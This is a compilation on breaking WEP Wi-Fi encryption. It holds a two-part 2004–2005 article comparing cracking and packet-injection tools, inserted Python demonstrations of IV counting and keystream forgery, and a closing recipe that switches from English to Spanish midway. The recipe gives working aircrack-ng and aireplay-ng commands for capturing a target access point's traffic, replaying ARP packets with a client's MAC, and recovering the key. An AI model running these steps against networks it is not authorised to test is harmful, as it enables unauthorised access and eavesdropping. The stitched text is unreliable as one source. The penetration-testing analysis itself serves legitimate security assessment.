WEP: Dead Again, Part 1 by Michael Ossmann

Source. 14/12/2004

Introduction
This article is the first of a two-part series that looks at the new generation of WEP cracking tools for WiFi networks, which offer dramatically faster speeds for penetration testers over the previous generation of tools. In many cases, a WEP key can be determined in seconds or minutes. Part one, below, compares the latest KoreK based tools that perform passive statistical analysis and brute-force cracking on a sample of collected WEP traffic. Next time, in part two, we'll look at active attack vectors, including a method to dramatically increase the rate of packet collection to make statistical attacks even more potent.

Is WEP that bad?
Many security folks and even more wireless folks these days are saying that WEP isn't all that bad. They say that if you use modern equipment that filters weak Initialization Vectors (IVs) and change your keys frequently (or at least once in a while), nobody will ever crack your WEP. Sure, maybe some next-generation WEP attacks will arise one day that will change everything, but WEP is okay today for all but the most sensitive networks. Well, that next generation is already here, heralded by highly functional tools that make WEP look weaker than Barney Fife on guard duty, sleeping on the job.
Let's take a look at some of the new tools that should be in every penetration tester's bag of tricks, rather than delving into the details of why the various attacks work. Time and time again, the industry has shown that it will not reject broken security safeguards until attacks are actually demonstrated in the real world. Here's how to quickly turn some heads.

The way things were
Since the summer of 2001, WEP cracking has been a trivial but time consuming process. A few tools, AirSnort perhaps the most famous, that implement the Fluhrer-Mantin-Shamir (FMS) attack were released to the security community -- who until then were aware of the problems with WEP but did not have practical penetration testing tools. Although simple to use, these tools require a very large number of packets to be gathered before being able to crack a WEP key. The AirSnort web site estimates the total number of packets at five to ten million, but the number actually required may be higher than you think.
The first caveat to this old approach is that only encrypted packets count. As wireless access points transmit unencrypted beacons several times per second, it is easy to be fooled into believing that you have a larger number of useful packets than you really do. If you use Kismet for network discovery and sniffing, it breaks down the packet count for you, displaying the number of "Crypted" packets separately from the total number, as shown below:

Figure 1. Kismet in action.

The second thing working against your packet collection efforts is that only certain "interesting" or "weak" IVs are vulnerable to attack. Kismet also tells you how many of these have been gathered, although it may not use the same counting method as the various cracking tools. To make matters more difficult, wireless manufacturers responded to the FMS attack by filtering out the majority of weak IVs that their access points and wireless cards transmit. Unless your target network is using old equipment, chances are you'll have to collect no less than ten million encrypted packets to crack a WEP key using these older tools.
In early 2002, h1kari released a tool called dwepcrack (part of the bsd-airtools package) that improved upon the existing implementations of the FMS attack. Although dwepcrack did a good job of advancing the practical implementation of statistical WEP cryptanalysis, its improvements were only incremental.

Tools that changed everything
On August 8th, 2004, a hacker named KoreK posted new WEP statistical cryptanalysis attack code (soon to become a tool called chopper) to the NetStumbler forums. While chopper is functional, it is not currently maintained, and the attacks have since seen better implementations in aircrack and WepLab. However, the KoreK attacks change everything. No longer are millions of packets required to crack a WEP key; no longer does the number of obviously "weak" or "interesting" IVs matter. With the new attacks, the critical ingredient is the total number of unique IVs captured, and a key can often be cracked with hundreds of thousands of packets, rather than millions.

Aircrack
The first tool in our new WEP cracking toolbox is aircrack by Christophe Devine. Implementing KoreK's attacks as well as improved FMS, aircrack provides the fastest and most effective statistical attacks available. To give aircrack a try, simply collect as many packets as possible from a WEP encrypted wireless network, save them as a pcap file, and then start aircrack from the command line.

Figure 2. aircrack succeeds.

How many packets does it take?
The number of packets required for success with aircrack varies greatly. As a rule of thumb, shoot for a minimum of 200,000 for a 64 bit key and 500,000 for a 128 bit key, and remember to count only encrypted packets with unique IVs, not total packets. aircrack comes with a handy packet capture tool called airodump that keeps a running tally of unique IVs (the counting method is imperfect but soon to be fixed) and is capable of handling very large capture files. Personally, I find it easier to use Kismet most of the time and simply estimate the number of unique IVs based on the number of "Crypted" packets reported by Kismet. The number of encrypted packets with unique IVs is typically more than 95% of the total number of encrypted packets.
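To make the counting concrete, here is an added example (my own, not code from the article or from any of the tools it describes) that walks a list of raw 802.11 frames and reports the figures Kismet and airodump display: total frames, encrypted frames, unique IVs and weak IVs. The frames are constructed inline, and the weak-IV class counted, the FMS form (A+3, 255, X), is an assumption about which class a given tool reports.

```python
"""Count what the WEP cracking tools actually count: encrypted frames,
unique IVs and FMS-class weak IVs, over raw 802.11 frames."""
from collections import Counter

HDR_LEN = 24          # data frame header without Address 4 or QoS control
PROTECTED = 0x40      # "Protected Frame" bit in the second frame-control byte


def parse_frame(frame):
    """Return (frame_type, subtype, protected, iv) for one raw 802.11 frame.
    iv is the 3-byte WEP IV, or None when the frame is not WEP-encrypted."""
    if len(frame) < HDR_LEN:
        raise ValueError("truncated 802.11 header")
    fc0, fc1 = frame[0], frame[1]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    protected = bool(fc1 & PROTECTED)
    iv = None
    if protected:
        # Body starts with IV (3 bytes) + key id byte, then ciphertext + ICV
        body = frame[HDR_LEN:]
        if len(body) < 4 + 4:
            raise ValueError("protected frame too short to carry IV and ICV")
        iv = bytes(body[:3])
    return ftype, subtype, protected, iv


def is_fms_weak(iv, key_bytes=13):
    """FMS 'weak' IV class (A+3, 255, X), A = index of the key byte the IV
    leaks. Assumption: this is the class AirSnort-style counters report;
    individual tools may count slightly different sets."""
    return 3 <= iv[0] < 3 + key_bytes and iv[1] == 0xFF


def summarize(frames, key_bytes=13):
    """Tally total, encrypted, unique-IV and weak-IV counts for a capture."""
    total = encrypted = 0
    ivs = Counter()
    for f in frames:
        total += 1
        _, _, protected, iv = parse_frame(f)
        if protected:
            encrypted += 1
            ivs[iv] += 1
    weak = sum(1 for iv in ivs if is_fms_weak(iv, key_bytes))
    return {"total": total, "encrypted": encrypted,
            "unique_ivs": len(ivs), "weak_ivs": weak}


# --- constructed sample traffic (not captured from any real network) ---
def _frame(ftype, subtype, protected, body):
    fc0 = (subtype << 4) | (ftype << 2)
    fc1 = PROTECTED if protected else 0
    # frame control (2) + duration (2) + addr1..3 (18) + sequence control (2)
    return bytes([fc0, fc1, 0, 0]) + b"\x00" * 20 + body


def _wep_frame(iv):
    # IV + key id 0 + 8 dummy ciphertext bytes + 4 dummy ICV bytes
    return _frame(2, 0, True, iv + b"\x00" + b"\xAA" * 8 + b"\xBB" * 4)


SAMPLE = [_frame(0, 8, False, b"\x00" * 12) for _ in range(3)]   # beacons
SAMPLE += [_wep_frame(iv) for iv in (b"\x01\x02\x03", b"\x01\x02\x03",
                                     b"\x04\xff\x10", b"\x7f\x00\x01",
                                     b"\x04\xff\x10")]

if __name__ == "__main__":
    print(summarize(SAMPLE))
```

The beacons inflate the total without adding IVs, and the two repeated IVs show why "Crypted" overstates the number of unique IVs.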

How long does it take?
I often find that aircrack determines a WEP key within a few seconds, but the execution time is highly variable. Shorter execution times require more unique IVs, more luck, and the lowest successful "fudge factor," a setting that tells aircrack how wildly it should guess when trying new keys. The higher the fudge factor, the more keys aircrack will try, increasing both the potential time of execution and the likelihood that the attack will succeed. The fudge factor has a default value of two but may be set to any positive integer. The default setting may be a good place to start, but trying several different settings is frequently fruitful if the initial attack does not succeed. I have encountered some data sets that could be cracked with a fudge factor of one, several that could only be cracked with three, four, or higher, and one data set that could only be cracked with a fudge factor of 31 or higher.
The higher the fudge factor, the more branches aircrack will take. This generally results in a longer execution time unless a successful crack happens early in the process. The following graph shows the time of execution as reported by aircrack (not counting file loading and parsing) for a particular data set with various fudge factors. Blue dots represent the time required for a successful crack and red dots represent the time spent in a failed attempt.

Figure 3. aircrack execution times.

If the default fudge factor (two) fails, I usually double it for each subsequent attack on the same data set. By terminating any attack that takes longer than five or ten minutes, I have had good luck finding a successful fudge factor fairly quickly.
One of the nice features of aircrack is that it works for both 64 bit and 128 bit WEP keys by default. If you know the key length of the target network, giving the length to aircrack as a command line option can speed up the process.

WepLab
Although not quite as successful in my tests, Jose Ignacio Sanchez's WepLab provides an alternative implementation of the KoreK attacks that can be nearly as effective as aircrack, with a little experimentation. Similar to aircrack's fudge factor, WepLab provides a probability adjustment with its --perc command line option. The default --perc setting of 50% is fairly aggressive and results in relatively few branches, while higher settings increase the number of branches taken. In addition to excellent statistical attacks, WepLab provides brute force and dictionary cracking attacks that can be very effective. This combination of techniques makes WepLab an essential tool.

Comparing the tools
WepLab and aircrack are certainly impressive, but are they the best tools in the box? To find out, I performed a series of tests comparing the ability of several statistical WEP cracking tools. To set up the test, I configured a wireless access point with a random 128 bit WEP key, generated a great deal of traffic, and collected about 25 million encrypted packets. I then carved up the capture into shuffled subsets of various lengths and tried to crack each subset with each tool, measuring the number of seconds for every successful crack (including file load times). Trials that lasted more than ten hours were terminated. The results surprised me quite a bit.

                                    128 bit Cracking Time in Seconds
     Data   Weak      Unique   aircrack  aircrack  AirSnort    WepLab    WepLab  WEPCrack dwepcrack
  Packets    IVs         IVs  (default)    (-f 4)           (default) (perc 95)
 23457438   8560    16775533     Failed       245        92    Failed       244    Failed     Error
 21016149   1807    16775167     Failed       249        41    Failed       247    Failed    Failed
 19584364   9340    16275925     Failed       230       114    Failed       229    Failed    Failed
 15690079   8694    12860342     Failed       184        90    Failed       179    Failed     Error
 15628308   5505    12361369     Failed       176        70    Failed       174    Failed    Failed
 11743639   8473    11743639     Failed       154        69    Failed       153    Failed     Error
 11739339   3037    11693841     Failed       150    Failed    Failed       151    Failed    Failed
  7829104   1001     5031233     Failed        74    Failed    Failed        77    Failed     Error
  7799213   5225     7779299     Failed        87        37    Failed       101    Failed    Failed
  4175159   1554     4069824         52        51    Failed    Failed        54    Failed    Failed
  3914568    767     3914568     Failed    Failed    Failed    Failed    Failed    Failed     Error
  3914553   3958     3914553         48        49    Failed    Failed        56    Failed     Error
  3884657   1490     3864743         48        46    Failed    Failed        52    Failed    Failed
   978652    986      978652     Failed    Failed    Failed    Failed        11    Failed     Error
   978633    371      978633     Failed        12    Failed    Failed        13    Failed     Error
   977219    264      974902     Failed         9    Failed    Failed        13    Failed    Failed
   684992    143      684992          8         8    Failed    Failed        11    Failed     Error
   683605    238      681288     Failed        18    Failed    Failed        13    Failed    Failed
   587184    117      587184     Failed        27    Failed    Failed      Long    Failed     Error
   489293    103      489293          8         7    Failed         5         5    Failed     Error
   489286    115      489286         15     16116    Failed    Failed      Long    Failed     Error
   391465     78      391465          5        13    Failed    Failed      Long    Failed     Error
   391433     78      391433     Failed         6    Failed    Failed         6    Failed     Error
   293596     65      293596     Failed         5    Failed    Failed      Long    Failed     Error
   293579     65      293579     Failed    Failed    Failed    Failed    Failed    Failed     Error
Table 1. 128 bit WEP Cracking Times (in seconds). "aircrack (-f 4)" is aircrack with a fudge factor of four, "WepLab (perc 95)" is WepLab with --perc 95, "Long" marks a trial terminated after ten hours, and "Error" marks a run that aborted with an error message.

Although aircrack was successful with the greatest number of data sets, it did not perform as well as I expected with the default fudge factor. In fact, beyond about four million packets, its success rate with default options noticeably declined with the addition of more packets. This problem was easily remedied, however, by increasing the fudge factor. A fudge factor of four was successful in nearly every case. In the few cases in which a fudge factor of four did not work, I was able to find a successful setting in the five to twenty range.

WepLab's nearly complete failure with default options was surprising, but a little experimentation resulted in a --perc setting of 95% that rivaled even aircrack's best results. For some data sets, WepLab was more successful than aircrack; for others, aircrack was the winner. Overall, both tools yielded outstanding results with minor tweaking, though aircrack edged out WepLab in the smaller data sets.

AirSnort's success rate matched my expectations quite closely, cracking nearly every key with ten million or more packets but failing most of the time when using a smaller data set. AirSnort's speed beat out aircrack and WepLab in every case. Of course, an extra minute or two is rarely a concern, so the superior cracking ability of the KoreK attacks with far less required input puts WepLab and aircrack well above AirSnort in my book.

The most unexpected results were the total failures of WEPCrack and dwepcrack with all data sets. WEPCrack came up with as many as eleven out of thirteen correct bytes but always included incorrect bytes in its final result. Lacking a process to verify the correctness of a key, WEPCrack produced a false positive result every time. dwepcrack failed in every case, complaining of either "insufficient ivs," the inexplicable error, "unable to find a valid data packet in logfile," or, for my largest data set, "File too large." As the tests were performed under Linux, perhaps dwepcrack would be more successful in its native BSD environment.

Don't ignore the obvious
WepLab and aircrack make statistical attacks alarmingly easy, but many keys can be cracked without going to such lengths. The simple fact is that most people don't choose strong encryption keys, in part because vendors make it so easy to use weak ones. Because of this weakness, a great number of WEP encrypted networks are vulnerable to dictionary or brute force attacks that only require the capture of a single encrypted data packet to attempt.
The simplest brute force attack involves trying every possible binary key, a process that is completely impractical for 128 bit keys but may be worth trying for 64 bit keys if you have a few supercomputers lying around. WepLab and dwepcrack provide the ability; you provide the CPU cycles.
WepLab and WepAttack both provide two dictionary attack methods, one based on the more common MD5 hashing technique that many access points use to turn a passphrase into a binary WEP key, and the other using null terminated raw ASCII WEP keys, employed by a few devices. Knowledge of the target network hardware may help to determine which method would be preferred for a particular environment.
Because both of the above tools can use any dictionary in a text file or standard input, powerful password cracking utilities such as John the Ripper may be used to generate the word list. Combined with John's ability to apply rules (various capitalizations, appending numbers, etc.) to a basic dictionary, these tools result in a successful crack surprisingly often. Although both performed dictionary attacks successfully in my tests, WepLab executed faster while WepAttack provided the convenience of multiple simultaneous attack modes.
If a dictionary attack fails, an optimized brute force attack based on the vendor's passphrase method may be fruitful. For devices that use null terminated ASCII keys, WepLab offers a brute force attack that only tries ASCII bytes, resulting in a somewhat smaller (though still generally too large) key space. For the more common MD5 hashed passphrases, dwepcrack can execute an optimized brute force attack for 64 bit keys. This method, devised and first implemented by Tim Newsham, dramatically reduces the potential key space from 2^40 to 2^21 possible keys, resulting in an extremely fast attack.

The complete toolbox
Featuring the most effective statistical attacks available, aircrack may be the single most important tool in the box. WepLab is also essential, providing several techniques including an excellent alternative implementation of the KoreK attacks. AirSnort may be worth trying if you have a lot of packets to work with, but its position as statistical attack leader has been usurped. WepAttack is a nice addition for dictionary attacks, and dwepcrack provides the most fruitful brute force technique. The only other essential ingredient is a method to collect packets; while most of these tools include packet gathering as a built-in ability or ancillary program, I personally prefer Kismet for this function. All of these tools are available in the Auditor Security Collection live Linux CD-ROM.

Concluding part one
Looking at the outstanding success rate of aircrack and WepLab in the 500,000 to 1,000,000 packet range, it is clear that a new era is upon us. Vendors' efforts to limit the transmission of weak IVs have been blown away, and the time required to collect packets for a successful statistical attack has been reduced twentyfold. If you thought WEP was okay, think again.
All of the tools discussed so far are completely passive, receiving data but transmitting nothing. In part two, we will look at active WEP attacks, including a method to dramatically increase the rate of packet collection, making statistical attacks even more potent. Fasten your seat belts.

Notes:
Because a majority of the tools refer to 64 bit and 128 bit key lengths, this article adopts the convention. It is important to realize, however, that the secret portion of a 64 bit key is only 40 bits and the secret portion of a 128 bit key is only 104 bits.
All tests were performed with a 1.6GHz Pentium-M laptop running Gentoo Linux (2.6.8.1 kernel). Linux was chosen for the tests in order to accommodate the greatest number of tools. Some of the tools are also available for OS X, Windows, and/or various BSDs. In addition, there are a few tools for the other platforms that are not available for Linux. None of these, however, appear to implement the KoreK attacks except for the current development version of KisMAC.


Tool information and links:

aircrack

      - version: 2.1
      - sample invocation: aircrack -n 128 packets.pcap
      - sample invocation: aircrack -f 4 -n 128 packets.pcap
      - source:  http://www.cr0.net:8040/code/network/aircrack/ 

AirSnort

      - version: 0.2.6
      - sample invocation: airsnort
      - 128 bit crack breadth: 2 (default)
      - source:  http://airsnort.shmoo.com/ 

Auditor Security Collection

      - version: 081004-01
      - source:  http://remote-exploit.org/?page=auditor

dwepcrack

      - version: 0.4
      - sample invocation: dwepcrack -s -w packets.pcap
      - sample invocation: dwepcrack -b packets.pcap
      - source:  http://www.e.kth.se/~pvz/wifi/ 
      - notes: also tried binary from Auditor Security Collection with identical results

John the Ripper

      - version: 1.6
      - source:  http://www.openwall.com/john/ 
      - wiki: en.wikipedia.org/wiki/John_the_Ripper

Kismet (scanning tool)

      - version: Kismet-2004-10-R1
      - source:  http://www.kismetwireless.net/ 

WepAttack

      - version: 0.1.3
      - sample invocation: john -w:words.txt -rules -stdout | wepattack -m n64 -f packets.pcap
      - source:  http://wepattack.sourceforge.net/ 

WEPCrack

      - version: 0.1.0
      - sample invocation: pcap-getIV.pl -b 13 -f packets.pcap; WEPCrack.pl
      - source:  http://wepcrack.sourceforge.net/ 

WepLab

      - version: 0.1.3
      - sample invocation: weplab -rpackets.pcap --key 128 testers.pcap
      - sample invocation: john -w:words.txt -rules -stdout | weplab -y --key 64 --attacks 1 testers.pcap
      - source:  http://weplab.sourceforge.net/ 

Ideally, the input data sets would come from a variety of source networks with varied hardware and WEP keys. Although the results are not fully comprehensive, the spot checks against various networks generally agree with the test results.

WEP: Dead Again, Part 2 by Michael Ossmann

Source. 08/03/2005

Introduction
In part one we examined the latest generation of passive WEP cracking tools that use statistical or brute force techniques to recover WEP encryption keys from captured wireless network traffic. This time, in the second and final article, we take a look at active tools that use 802.11 transmissions to attack WEP networks.
All of the active wireless attack techniques discussed in this article require the ability to inject arbitrary packets onto a wireless network. Although a variety of injection methods are available, most require Linux, are unsupported, and use hacked drivers that have support and availability problems. All of them require at least one wireless PCMCIA card based on the Prism2 chipset (such as the Senao 2511-CD-PLUS). Fortunately, the Auditor Security Collection [ref 1] live CD-ROM can save you a number of headaches, as it includes ready-to-use drivers for several active attack tools.
Beware of network disruptions that can be caused by active attacks. Using these tools may have unpredictable effects in various environments. In my testing, I have encountered a few systems that had to be rebooted in order to function again after being bombarded with injected packets.

Rapid traffic generation
If you've spent much time sniffing wireless networks (and, if you are reading this article, I bet you have) then you probably have noticed that the source and destination MAC addresses are plainly visible for every packet even when the packet contents are encrypted with WEP. This allows you to uniquely identify hosts on the wireless network as well as hosts on a bridged, wired LAN. If you've never tried traffic analysis of an encrypted wireless network, I highly recommend the exercise. Find a busy network, fire up Ethereal [ref 2], and try to answer as many of the following questions as you can:

  * How many access points share the same ESSID?
  * Does the access point bridge or route traffic?
  * Is EAP used? If so, what EAP type?
  * Is open system or shared key authentication in use?
  * What is the MAC address of the default gateway?
  * What are the NIC vendors for wireless hosts?
  * What are the NIC vendors for wired hosts?
  * What is the vendor of the access point?
  * Can you find a DNS transaction?
  * Can you find a TCP three-way handshake?
  * Can you find an HTTP transaction?
  * What hosts transmit/receive the most bytes/packets?
  * Does any traffic occur with a distinct periodicity (like POP3 every 5 minutes)?
  * Can you find any ARP traffic? (hint: frame.pkt_len==68 and wlan.da==ff:ff:ff:ff:ff:ff)

No wireless network based on WEP provides protection against replay attacks. With the right tools, you can take any captured packet and reinject it back onto the network. The packet will be correctly encrypted even though you have no idea of its contents. Then again, you may have a pretty good guess as to its contents based on traffic analysis. You might choose something that is likely to be an ARP request, hoping that it will generate a response from another host on the network. If you're right, you could replay the same packet hundreds or even thousands of times per second, forcing that host to spew an enormous stream of responses, individually encrypted with different IVs.
The method just described is exactly the one used by aireplay, a tool that comes with aircrack [ref 3]. A screenshot of aireplay is shown below in Figure 1. As we discovered in part one, both aircrack and WepLab [ref 4] are capable of cracking WEP keys after collecting just a few hundred thousand packets. With a successful aireplay attack, you can generate that many packets in just a few minutes. Therefore, people who say that re-keying every 10 minutes makes WEP unbreakable are dead wrong. Per-session, per-user keys also don't stand a chance against this attack. WEP is truly dead... again.
Figure 1. Aireplay at work.
The Auditor Security Collection live cd-rom makes it relatively easy to try aireplay because it includes aircrack's patched hostap driver by default, but you will need two wireless cards with at least several inches distance between their antennas. You may find it easier to use two laptops, one with a Prism2 card to replay captured packets, and a second to capture all the new traffic that is generated. Be prepared to spend some time finding an appropriate packet to replay; you may need to save individual packets with Ethereal and feed them to aireplay.
Another tool that implements a similar attack has been around for much longer in the BSD world. Part of OpenBSD's Wnet, reinj performs the same attack as aireplay and does it all with just one Prism2 card (as does the latest beta of aireplay). Whichever tool you use to generate traffic, I recommend WepLab or aircrack for cracking the WEP key.

Encrypted packet injection
Most of the WEP attack tools on the scene today focus on cracking WEP keys, but there are also other WEP vulnerabilities that can be exploited. WEPWedgie [ref 5], a tool released in 2003 by Anton Rager, allows an attacker to craft an arbitrary plaintext packet and inject it into the wireless network without knowledge of the WEP key. The receiving stations accept the packet as if the sender used the correct key to encrypt the packet. The way WEPWedgie is able to accomplish this is by reconstructing the key stream that was used to encrypt a particular plaintext. With knowledge of some plaintext and the resulting ciphertext, a simple XOR operation yields the keystream that results from a particular IV. And because WEP allows the same IV to be used over and over again, WEPWedgie can use the keystream to correctly encrypt and inject any number of packets whose contents are limited only by the length of the known keystream.
There are a number of ways that an attacker can discover the ciphertext for a known plaintext, but the method used by WEPWedgie's prgasnarf is to listen for shared key authentication. The 802.11 standard defines two types of authentication, "open system authentication" (which you can think of as "no authentication") and "shared key authentication" (which you can think of as "the most misguided authentication mechanism ever devised"). In shared key authentication, the AP transmits 128 bytes of plaintext, and then the station encrypts the plaintext and transmits the resulting ciphertext using the same key and cipher that are used by WEP to encrypt subsequent network traffic. Believe it or not, this horrifying scheme is still being recommended by certain vendors [ref 6] as a security enhancement, but it is less common in practice than open system authentication.
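The keystream recovery the two paragraphs above describe, as an added example that is not WEPWedgie's code or any other code from the article: a toy WEP in Python (RC4 keyed with IV||key over data plus a CRC-32 ICV), the AP's 128-byte shared-key challenge as the known plaintext, and a check that the recovered keystream encrypts new data under the same IV but is useless under any other IV. Key, IV and challenge are constructed values.

```python
"""Why one known plaintext/ciphertext pair under an IV lets anyone encrypt
under that IV without the key: WEP is RC4(IV || key) XOR (data || CRC-32)."""
import struct
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4 keystream generator (KSA + PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the data, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    """Return iv || (RC4(iv||key) XOR (data || ICV))."""
    body = data + icv(data)
    return iv + xor(body, rc4(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes):
    """Decrypt and check the ICV; return the data, or None if the ICV fails."""
    iv, body = frame[:3], frame[3:]
    plain = xor(body, rc4(iv + key, len(body)))
    data, tag = plain[:-4], plain[-4:]
    return data if icv(data) == tag else None


def recover_keystream(known_plaintext: bytes, frame: bytes) -> bytes:
    """Keystream for the frame's IV, as long as known plaintext + ICV.
    In shared key authentication the AP's 128-byte challenge is the known
    plaintext and the station's encrypted reply is the ciphertext."""
    return xor(known_plaintext + icv(known_plaintext), frame[3:])


def encrypt_with_keystream(iv: bytes, keystream: bytes, data: bytes):
    """Build a frame for `data` under `iv` using only the recovered keystream.
    Returns None when the keystream is too short to cover data + ICV, which
    is the length limit the article mentions."""
    body = data + icv(data)
    if len(body) > len(keystream):
        return None
    return iv + xor(body, keystream[:len(body)])


def demo(key=b"\x01\x23\x45\x67\x89", iv=b"\x0a\x0b\x0c"):
    """Known plaintext -> keystream -> frame the real key accepts.
    Returns (forged_accepted, too_long_refused, other_iv_rejected)."""
    challenge = bytes(range(128))               # constructed AP challenge
    response = wep_encrypt(key, iv, challenge)  # station's encrypted reply
    ks = recover_keystream(challenge, response)
    msg = b"encrypted with the keystream, never with the key"
    forged_accepted = wep_decrypt(key, encrypt_with_keystream(iv, ks, msg)) == msg
    too_long_refused = encrypt_with_keystream(iv, ks, bytes(200)) is None
    other_iv = iv[:2] + bytes([iv[2] ^ 1])      # same keystream, different IV
    other_iv_rejected = wep_decrypt(key, encrypt_with_keystream(other_iv, ks, msg)) is None
    return forged_accepted, too_long_refused, other_iv_rejected


if __name__ == "__main__":
    print(demo())
```

Because RC4 output depends only on IV||key and WEP lets the IV repeat, the receiver has no way to tell the forged frame from one built by a station holding the key.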
Once a keystream has been captured (hint: spoofed deauthentication), WEPWedgie provides a number of interesting packet injection attacks. A simple one sends a ping to a target of your choice. The other attacks provide a method of port scanning targets on the wireless network using a chosen source address. As long as the target network has Internet connectivity, you can use the address of a host you control on a remote network and sniff the results of your scan on that host. Interpretation of the results is up to you.

Figure 2. Wepwedgie injecting pings.

To try out WEPWedgie, you'll need a system running a Linux 2.4 kernel, a Prism2 card, and Abaddon's AirJack [ref 7] driver. Unfortunately the Auditor CD's 2.6 kernel isn't supported by AirJack, so you'll have to prepare a system on your own. You might find the Wi-Fi Dog of War [ref 8] instructions helpful to get AirJack working.

Single packet decryption
KoreK, the individual who brought us the improved algorithms used in aircrack and WepLab, released a tool a few months ago on the NetStumbler forums that enables an attacker to decrypt individual packets without knowledge of the WEP key. Called chopchop [ref 9], this tool replays a single encrypted packet, modifying one byte at a time. By monitoring the access point to find out if it accepts the modified packet, chopchop is able to determine the plaintext value of that particular byte and move on to the next. Within several seconds (and thousands of replayed packets), chopchop can decrypt an entire packet. It doesn't matter what encryption key was used, or if a separate key is used for each user, or if the key changes every hour or minute; any packet can be decrypted.

Figure 3. Chopchop decrypting a single packet.

You can use the Auditor CD and a single Prism2 card to try chopchop. Use the switch-to-wlanng script that Auditor provides, pop the card out and then back in again, and the linux-wlan-ng driver will be working, complete with KoreK's injection modifications.

The next generation
Since the release of chopchop, the task of acquiring a valid keystream for encrypted packet injection has become trivial for all WEP encrypted networks. Joshua Wright is working on a new version of WEPWedgie that incorporates the chopchop attack and works with newer drivers. Christophe Devine's upcoming version of aireplay, already released as a beta, uses the same technique to allow the forgery of any ARP request. Various people are working to improve wireless drivers, including implementation of packet injection with a wider variety of hardware (prism54 is reported to work already), and construction of an abstraction layer for packet injection.

Conclusion
Some vendors continue to sell products that completely lack reasonable wireless security features. In just two months since the publication of part one of this article, I've encountered multiple brand new devices, including Wi-Fi VOIP phones and an access point provided by a cable Internet provider, that provide no encryption capability other than WEP. As long as this continues, white hats and black hats alike will keep improving the attack techniques that render WEP even worse than useless.
For the most part, the newer WEP attack tools exploit vulnerabilities that were described in theory four or more years ago. Perhaps people will learn from the history of WEP the lesson that theoretical vulnerabilities will become real vulnerabilities. Until they do, you can use these penetration testing tools to assess the weaknesses of your own network and maybe even convince someone that change is needed.

Tools and links

[1] Auditor Security Collection:
  http://remote-exploit.org/?page=auditor

[2] Ethereal:
  http://www.ethereal.com/

[3] aircrack:
  http://www.cr0.net:8040/code/network/aircrack/

[4] WepLab:
  http://weplab.sourceforge.net/

[5] WEPWedgie:
  http://sourceforge.net/projects/wepwedgie/

[6] Linksys recommends shared key authentication:
  http://www.linksys.com/splash/wirelessnotes.asp

[7] AirJack:
  http://sourceforge.net/projects/airjack/

[8] Wi-Fi Dog of War Mini How-To:
  http://www.geekspeed.net/~beetle/download/wifi_dog.html

[9] chopchop:
  http://www.netstumbler.org/showthread.php?t=12489

About the author
Michael Ossmann is a security administrator for Exempla Healthcare.


How to break into a Wifi link
Recipe

I'm going to post a little recipe for recovering a WEP key with Aircrack-ng, as a companion to Video: hackear WEP en 10 minutos and Video: hackear WEP en 10 minutos (II), since those are based on Aircrack rather than Aircrack-ng, and while I'm at it I'll add the option of using Aircrack-ptw to the recipe.

The steps use ath0, wifi0 and ath1 as the interfaces (Atheros cards); substitute whichever interfaces apply in your case.

1. First, have the drivers for your card correctly installed so that it can be put into monitor mode and inject traffic. This depends on the card's chipset; in my case it is Atheros and the driver is MadWifi. Here is a good page for seeing which chipset and driver each card uses, with filtering by manufacturer, chipset, etc.: Linux wireless LAN support

2. Once the card is configured and working, it has to be put into monitor mode, normally:

iwconfig ath0 mode monitor

If that method does not work (with Atheros it does not):

airmon-ng start wifi0 [channel]

This creates a new interface, ath1, which is the one we will use from now on (for other drivers/chipsets, whichever interface applies). Optionally, a channel can be given.

3. See which networks/clients are within range; for that we use airodump-ng as follows:

airodump-ng -w archivocaptura ath1

De esta forma veremos que redes/clientes hay para todos los canales.

4. Fijamos el objetivo, y miramos su bssid o mac y el canal en el que trabaja; para capturar especificamente para esa red:

airodump-ng -channel 9 -w archivocaptura ath1

Si se quiere restringir la captura a una red determinada, porque hay varias redes en el mismo canal, y queremos que la captura sea solo de una de ellas:

airodump-ng --bssid XX:XX:XX:XX:XX:XX -channel N -w archivocaptura ath1

Siendo XX:XX:XX:XX:XX:XX la MAC del AP objetivo y N el canal en el que está. La captura la haremos sin el -ivs, para que guarde los paquetes enteros, con vistas a poder usar aircrack-ptw que necesita que la captura se haga de esta forma.

5. Una vez que tenemos trabajando airodump-ng en un terminal, y tenemos algun cliente conectado a esa red (se ve en airodump-ng), abrimos otro terminal para la inyeccion de paquetes con aireplay:

aireplay-ng --arpreplay -b XX:XX:XX:XX:XX:XX -h YY:YY:YY:YY:YY:YY ath1

Siendo XX:XX:XX:XX:XX:XX la MAC del AP objetivo y YY:YY:YY:YY:YY:YY la del cliente conectado a esa red. Ahora deberiamos notar un incremento en la velocidad de captura de datos por parte de airodump-ng, en cuanto aireplay-ng capture y reinyecte paquetes ARP.

6. En cuanto tengamos unos cuantos paquetes capturados (80k-100k segun cada uno) podemos poner a trabajar a aircrack-ng o usar aircrack-ptw que necesita menos datos capturados para sacar la clave.

aircrack-ng -0 -x -i 1 archivocaptura.cap

-i 1 es para decirle que el indice de clave sera 1 (1-4) que es lo normal, esto lo podemos quitar si queremos. Por defecto busca contraseñas de 128bits; si es de 64 tambien la sacara pero tardara algo mas. Si se quiere indicar que la clave es de 64bits, podemos poner el parametro -n 64.

Para aircrack-ptw:

aircrack-ptw archivocaptura.cap

Pues ya esta, esta es la receta. Si todo va bien, tendremos la clave, tanto en Hexadecimal como en ASCII.

Aclaración: las opciones -channel, -bssid y -arpreplay van con doble guión delante (por si no se ve bien).
